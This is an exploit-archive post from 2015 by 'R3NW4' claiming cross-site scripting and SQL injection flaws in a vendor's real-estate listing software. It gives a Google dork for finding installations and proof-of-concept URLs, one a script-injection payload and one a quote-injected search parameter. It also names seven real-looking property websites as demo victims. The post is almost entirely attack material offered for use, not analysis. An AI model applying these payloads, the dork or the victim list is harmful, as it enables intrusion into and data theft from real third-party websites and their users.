facebook facebook twitter rss

Israel Real Estate SQLi+XSS

Author: R3NW4 , Published: 07-07-2015
# Exploit Title: [Israel Real Estate SQLi+XSS ]
# Google Dork: [מקבוצת BMBY – תוכנות נדל"ן ותיווך powered by]
# Date: [6-7-2015]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Version: [All Versions]
# Tested on: [Linux(Debian)]
# Greetz: All Kurdish Hackers - Kurdistan - Peshmarga
-----------------------

XSS:

site.com/english/search.php?search_x=1&house_types_rent=-1&cat_id=6&city=2http://star-gold.co.il/english/search.php?search_x=1&house_types_rent=-1&cat_id=6&city=36'"--></style></script><script>alert(String.fromCharCode(88,
83, 83, 80, 79, 83, 69, 68))</script>

------------------------

SQLi:


site.com/english/search.php?id=&href_from=&save_x=&active_query=&cat_id=6&city=-1&region[]=-1&space_min=1%27&space_max=&rooms_min=-1&rooms_max=-1&price_min=&price_max=&price_unit=USD&search.x=0&search.y=0

------------------------

Demo:

http://www.zimuki.com
http://ben-zimra.com
http://uricka.com
http://www.exclusive-properties.co.il
www.arie-agency.com
http://www.alot.co.il
http://home2.co.il

------------------------

https://twitter.com/R3NW4
0x3r3nw4@gmail.com

Like us on Facebook :